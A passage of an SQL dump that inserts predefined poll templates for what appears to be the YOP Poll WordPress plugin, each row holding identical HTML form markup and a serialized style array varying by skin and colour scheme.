class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:4:"flat";s:11:"colorScheme";s:4:"pink";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(46, 'basic-pretty', 'Flat Purple', 'flat-purple', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="flat" data-cscheme="purple">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:4:"flat";s:11:"colorScheme";s:6:"purple";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(47, 'basic-pretty', 'Minimal Black', 'minimal-black', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="minimal" data-cscheme="black">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:7:"minimal";s:11:"colorScheme";s:5:"black";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(48, 'basic-pretty', 'Minimal Red', 'minimal-red', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="minimal" data-cscheme="red">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:7:"minimal";s:11:"colorScheme";s:3:"red";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(49, 'basic-pretty', 'Minimal Green', 'minimal-green', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="minimal" data-cscheme="green">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:7:"minimal";s:11:"colorScheme";s:5:"green";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(50, 'basic-pretty', 'Minimal Blue', 'minimal-blue', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="minimal" data-cscheme="blue">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:7:"minimal";s:11:"colorScheme";s:4:"blue";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(51, 'basic-pretty', 'Minimal Aero', 'minimal-aero', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="minimal" data-cscheme="aero">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:7:"minimal";s:11:"colorScheme";s:4:"aero";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(52, 'basic-pretty', 'Minimal Grey', 'minimal-grey', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="minimal" data-cscheme="grey">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:7:"minimal";s:11:"colorScheme";s:4:"grey";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(53, 'basic-pretty', 'Minimal Orange', 'minimal-orange', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="minimal" data-cscheme="orange">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:7:"minimal";s:11:"colorScheme";s:6:"orange";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: 